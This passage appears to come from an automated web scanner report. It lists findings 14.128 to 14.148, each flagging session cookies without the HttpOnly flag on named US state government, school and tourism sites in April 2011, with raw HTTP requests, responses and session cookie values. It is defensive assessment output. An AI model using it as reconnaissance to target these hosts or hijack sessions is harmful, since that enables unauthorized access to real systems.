The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /device.htm HTTP/1.1
Host: www.cotrip.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:31:07 GMT
Server: Apache/2.2.11 (Ubuntu) mod_jk/1.2.26
Set-Cookie: JSESSIONID=031980C19CBB99378384441260892E13.node1; Path=/
Content-Language: en
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 34775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   <meta http-equiv="pragma" content="no-cache"/>



...[SNIP]...

14.128. http://www.dds.ga.gov/drivers/DLdata.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dds.ga.gov
Path:   /drivers/DLdata.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /drivers/DLdata.aspx HTTP/1.1
Host: www.dds.ga.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:31:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=oyq2adjrds3ociihzddagwaw; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8116


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
   <HEAD>
       <title>
           
       </title>
       <meta content="http://schemas.microsoft.com/int
...[SNIP]...

14.129. http://www.deldot.gov/public.ejs  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.deldot.gov
Path:   /public.ejs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /public.ejs HTTP/1.1
Host: www.deldot.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 30 Apr 2011 12:31:34 GMT
Server: Apache
Cache-Control: no-cache="Set-Cookie"
Location: http://www.deldot.gov/
Set-Cookie: JSESSIONID=PjN2N8BF1jyymQNwy0pfyQqzvyy9226MyN71zbhxyTGpKHTnkwRB!-998489167; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 239

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www.deldot.gov/">http://www
...[SNIP]...

14.130. http://www.delmar.k12.de.us/education/district/district.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.delmar.k12.de.us
Path:   /education/district/district.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /education/district/district.php HTTP/1.1
Host: www.delmar.k12.de.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:31:34 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: PHPSESSID=00b424bcc64093de48b0d5db9594ffd3; path=/
Expires: Wed, 26 Feb 1997 08:21:57 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 124126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...

14.131. http://www.dhh.louisiana.gov/links.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dhh.louisiana.gov
Path:   /links.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /links.asp HTTP/1.1
Host: www.dhh.louisiana.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=111614033.1304125393.1.1.utmcsr=la.gov|utmccn=(referral)|utmcmd=referral|utmcct=/Government/Boards_and_Commissions/; __utma=111614033.738094163.1304125393.1304125393.1304125393.1; ASPSESSIONIDAQAAASST=GIHALCJBLNDELFDEKKMHGALF; __utmc=111614033; __utmb=111614033.1.10.1304125393;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:31:35 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 38517
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQADBRTS=PFEHLOMBKLFPIMBKCIAONMMD; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
   <title>Louisiana Department of Health & Hospitals</title>
   <META HTTP-EQUIV="Content-Type" CONTENT="text/html; c
...[SNIP]...

14.132. http://www.dhh.louisiana.gov/offices/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dhh.louisiana.gov
Path:   /offices/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offices/ HTTP/1.1
Host: www.dhh.louisiana.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=111614033.1304125393.1.1.utmcsr=la.gov|utmccn=(referral)|utmcmd=referral|utmcct=/Government/Boards_and_Commissions/; __utma=111614033.738094163.1304125393.1304125393.1304125393.1; ASPSESSIONIDAQAAASST=GIHALCJBLNDELFDEKKMHGALF; __utmc=111614033; __utmb=111614033.1.10.1304125393;

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Sat, 30 Apr 2011 12:31:35 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Location: ../
Content-Length: 124
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQADBRTS=AGEHLOMBKPBKOHMHHLJMKCKE; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="../">here</a>.</body>

14.133. http://www.dhh.louisiana.gov/offices/email-page.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dhh.louisiana.gov
Path:   /offices/email-page.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offices/email-page.asp HTTP/1.1
Host: www.dhh.louisiana.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=111614033.1304125393.1.1.utmcsr=la.gov|utmccn=(referral)|utmcmd=referral|utmcct=/Government/Boards_and_Commissions/; __utma=111614033.738094163.1304125393.1304125393.1304125393.1; ASPSESSIONIDAQAAASST=GIHALCJBLNDELFDEKKMHGALF; __utmc=111614033; __utmb=111614033.1.10.1304125393;

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Sat, 30 Apr 2011 12:31:36 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Location: ../
Content-Length: 124
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQADBRTS=EGEHLOMBFHJBKJJBEBEBCKJB; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="../">here</a>.</body>

14.134. http://www.dhh.louisiana.gov/offices/faq.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dhh.louisiana.gov
Path:   /offices/faq.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offices/faq.asp HTTP/1.1
Host: www.dhh.louisiana.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=111614033.1304125393.1.1.utmcsr=la.gov|utmccn=(referral)|utmcmd=referral|utmcct=/Government/Boards_and_Commissions/; __utma=111614033.738094163.1304125393.1304125393.1304125393.1; ASPSESSIONIDAQAAASST=GIHALCJBLNDELFDEKKMHGALF; __utmc=111614033; __utmb=111614033.1.10.1304125393;

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Sat, 30 Apr 2011 12:31:37 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Location: ../
Content-Length: 124
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQADBRTS=AHEHLOMBNLBIIELPAAGOIABE; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="../">here</a>.</body>

14.135. http://www.dhh.louisiana.gov/offices/inquiryform.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dhh.louisiana.gov
Path:   /offices/inquiryform.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offices/inquiryform.asp HTTP/1.1
Host: www.dhh.louisiana.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=111614033.1304125393.1.1.utmcsr=la.gov|utmccn=(referral)|utmcmd=referral|utmcct=/Government/Boards_and_Commissions/; __utma=111614033.738094163.1304125393.1304125393.1304125393.1; ASPSESSIONIDAQAAASST=GIHALCJBLNDELFDEKKMHGALF; __utmc=111614033; __utmb=111614033.1.10.1304125393;

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Sat, 30 Apr 2011 12:31:40 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Location: ../
Content-Length: 124
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQADBRTS=GJEHLOMBPMDJHJLPMHFHOAFL; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="../">here</a>.</body>

14.136. http://www.dhh.louisiana.gov/offices/links.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dhh.louisiana.gov
Path:   /offices/links.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offices/links.asp HTTP/1.1
Host: www.dhh.louisiana.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=111614033.1304125393.1.1.utmcsr=la.gov|utmccn=(referral)|utmcmd=referral|utmcct=/Government/Boards_and_Commissions/; __utma=111614033.738094163.1304125393.1304125393.1304125393.1; ASPSESSIONIDAQAAASST=GIHALCJBLNDELFDEKKMHGALF; __utmc=111614033; __utmb=111614033.1.10.1304125393;

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Sat, 30 Apr 2011 12:31:40 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Location: ../
Content-Length: 124
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQADBRTS=HJEHLOMBONMJCGPDOMJFPCDC; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="../">here</a>.</body>

14.137. http://www.dhh.louisiana.gov/offices/locations.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dhh.louisiana.gov
Path:   /offices/locations.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offices/locations.asp HTTP/1.1
Host: www.dhh.louisiana.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=111614033.1304125393.1.1.utmcsr=la.gov|utmccn=(referral)|utmcmd=referral|utmcct=/Government/Boards_and_Commissions/; __utma=111614033.738094163.1304125393.1304125393.1304125393.1; ASPSESSIONIDAQAAASST=GIHALCJBLNDELFDEKKMHGALF; __utmc=111614033; __utmb=111614033.1.10.1304125393;

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Sat, 30 Apr 2011 12:31:41 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Location: ../
Content-Length: 124
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQADBRTS=AKEHLOMBKJEIKDAFHEBNAFLM; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="../">here</a>.</body>

14.138. http://www.dhh.louisiana.gov/offices/page.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dhh.louisiana.gov
Path:   /offices/page.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offices/page.asp?id=252&detail=7752 HTTP/1.1
Host: www.dhh.louisiana.gov
Proxy-Connection: keep-alive
Referer: http://la.gov/Government/Boards_and_Commissions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:02:43 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 40278
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAQAAASST=HIHALCJBOLEPJJHMFLAMHGEP; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
   <title>Records and Statistics (Vital Records) - Center for Records and Statistics - Office of Public Health - Lo
...[SNIP]...

14.139. http://www.dhh.louisiana.gov/offices/page.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dhh.louisiana.gov
Path:   /offices/page.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offices/page.asp HTTP/1.1
Host: www.dhh.louisiana.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=111614033.1304125393.1.1.utmcsr=la.gov|utmccn=(referral)|utmcmd=referral|utmcct=/Government/Boards_and_Commissions/; __utma=111614033.738094163.1304125393.1304125393.1304125393.1; ASPSESSIONIDAQAAASST=GIHALCJBLNDELFDEKKMHGALF; __utmc=111614033; __utmb=111614033.1.10.1304125393;

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Sat, 30 Apr 2011 12:31:42 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Location: ../
Content-Length: 124
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQADBRTS=DLEHLOMBLMKBEJPJIHMEAOAI; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="../">here</a>.</body>

14.140. http://www.dhh.louisiana.gov/offices/publications.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dhh.louisiana.gov
Path:   /offices/publications.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offices/publications.asp HTTP/1.1
Host: www.dhh.louisiana.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=111614033.1304125393.1.1.utmcsr=la.gov|utmccn=(referral)|utmcmd=referral|utmcct=/Government/Boards_and_Commissions/; __utma=111614033.738094163.1304125393.1304125393.1304125393.1; ASPSESSIONIDAQAAASST=GIHALCJBLNDELFDEKKMHGALF; __utmc=111614033; __utmb=111614033.1.10.1304125393;

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Sat, 30 Apr 2011 12:31:42 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Location: ../
Content-Length: 124
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQADBRTS=CLEHLOMBBPBKMIEPFLHAGGKA; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="../">here</a>.</body>

14.141. http://www.dhh.louisiana.gov/offices/reports.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dhh.louisiana.gov
Path:   /offices/reports.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offices/reports.asp HTTP/1.1
Host: www.dhh.louisiana.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=111614033.1304125393.1.1.utmcsr=la.gov|utmccn=(referral)|utmcmd=referral|utmcct=/Government/Boards_and_Commissions/; __utma=111614033.738094163.1304125393.1304125393.1304125393.1; ASPSESSIONIDAQAAASST=GIHALCJBLNDELFDEKKMHGALF; __utmc=111614033; __utmb=111614033.1.10.1304125393;

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Sat, 30 Apr 2011 12:31:42 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Location: ../
Content-Length: 124
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQADBRTS=ALEHLOMBGADIEAOJABODEJMI; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="../">here</a>.</body>

14.142. http://www.dhh.louisiana.gov/page.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dhh.louisiana.gov
Path:   /page.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /page.asp HTTP/1.1
Host: www.dhh.louisiana.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=111614033.1304125393.1.1.utmcsr=la.gov|utmccn=(referral)|utmcmd=referral|utmcct=/Government/Boards_and_Commissions/; __utma=111614033.738094163.1304125393.1304125393.1304125393.1; ASPSESSIONIDAQAAASST=GIHALCJBLNDELFDEKKMHGALF; __utmc=111614033; __utmb=111614033.1.10.1304125393;

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Sat, 30 Apr 2011 12:31:43 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Location: /offices/?id=1
Content-Length: 135
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQADBRTS=BMEHLOMBFHGIODHEDIJHFCHC; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/offices/?id=1">here</a>.</body>

14.143. http://www.dms.myflorida.com/mfmp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dms.myflorida.com
Path:   /mfmp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mfmp HTTP/1.1
Host: www.dms.myflorida.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=32692770.1813902578.1304123784.1304123784.1304123784.1; __utmb=32692770; __utmc=32692770; __utmz=32692770.1304123784.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache, must-revalidate
Cache-control: no-cache="set-cookie"
Content-language: en-US
Content-Type: text/html; charset=utf-8
Date: Sat, 30 Apr 2011 01:02:35 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: /index.php/business_operations/state_purchasing/myflorida_marketplace
Pragma: no-cache
Served-by: www.dms.myflorida.com
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: eZSESSIDe55d964d176b2c8162b80453de81825b=bflmfc1hla6nvfgqfls1hi6gs2; path=/
Set-Cookie: is_logged_in=deleted; expires=Fri, 30-Apr-2010 01:02:35 GMT; path=/
Set-Cookie: AWSELB=A3C1B975127510B99E0B3D4AD4BCFCB5BE329A4BD4F145F707697652604E2877FC7972CDC4DDE8FC33A71829F781F0B634D3965FD40A62CF73B75CB30108FBA03C34499686;PATH=/;MAX-AGE=3600
Status: 301 Moved Permanently
Vary: User-Agent,Accept-Encoding
X-Powered-By: eZ Publish
Connection: keep-alive
Content-Length: 7477


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


<he
...[SNIP]...

14.144. http://www.dsf.health.state.pa.us/health/cwp/view.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dsf.health.state.pa.us
Path:   /health/cwp/view.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /health/cwp/view.asp HTTP/1.1
Host: www.dsf.health.state.pa.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Sat, 30 Apr 2011 12:30:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.portal.state.pa.us/portal/server.pt/community/department_of_health_home/17457
Content-Length: 209
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCCBRSDS=MFKJLBPBHDPJKLPODFJOBCHK; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.portal.state.pa.us/portal/server.pt/community/department_of_health_home/17457">here</a>
...[SNIP]...

14.145. http://www.energyguide.com/EnergySmartSBE/welcomeba.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.energyguide.com
Path:   /EnergySmartSBE/welcomeba.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /EnergySmartSBE/welcomeba.asp HTTP/1.1
Host: www.energyguide.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Sat, 30 Apr 2011 12:32:02 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR SAMa IND UNI"
X-Powered-By: ASP.NET
Pragma: No-Cache
Location: htmError.asp?ScriptName=/EnergySmartSBE/welcomeba.asp&errMsg=Invalid%20client%20ID
Content-Length: 207
Content-Type: text/html
Expires: Sat, 30 Apr 2011 04:12:02 GMT
Set-Cookie: ASPSESSIONIDASRCSDTC=LALBKAACPGILALFHHLHDICMB; path=/
Cache-control: private
Set-Cookie: Coyote-2-41d63264=c0a86403:0; expires=Sat, 30-Apr-11 12:47:25 GMT; path=/

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="htmError.asp?ScriptName=/EnergySmartSBE/welcomeba.asp&amp;errMsg=Invalid%20client%20ID">here</a>.<
...[SNIP]...

14.146. http://www.exploreohio.org/node/11452  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.exploreohio.org
Path:   /node/11452

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /node/11452 HTTP/1.1
Host: www.exploreohio.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:32:03 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Set-Cookie: SESS06af59565acd35773def796a77a89818=352a4938167485ab218ce098f1c260f3; expires=Mon, 23 May 2011 16:05:23 GMT; path=/; domain=.exploreohio.org
Last-Modified: Sat, 30 Apr 2011 12:29:39 GMT
ETag: "c7afc20a709b6bfbf39bfcbd446a4bde"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 150735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta htt
...[SNIP]...

14.147. http://www.flsenate.gov/Legislators/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.flsenate.gov
Path:   /Legislators/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Legislators/index.cfm HTTP/1.1
Host: www.flsenate.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Location: /Senators/
Server: Microsoft-IIS/7.5
Set-Cookie: CFID=9376678;expires=Mon, 22-Apr-2041 12:32:15 GMT;path=/
Set-Cookie: CFTOKEN=36796557;expires=Mon, 22-Apr-2041 12:32:15 GMT;path=/
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 12:32:15 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<title>
...[SNIP]...

14.148. http://www.georgia.gov/external/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.georgia.gov
Path:   /external/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /external/?url=http://georgiawildlife.dnr.state.ga.us/content/displaynavigation.asp?TopCategory=12 HTTP/1.1
Host: www.georgia.gov
Proxy-Connection: keep-alive
Referer: http://ga.gov/00/channel_title/0,2094,4802_4969,00.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:46:11 GMT
Server: Apache/1.3.29 (Unix)
Expires: Tue, 20 Jun 1995 04:13:09 GMT
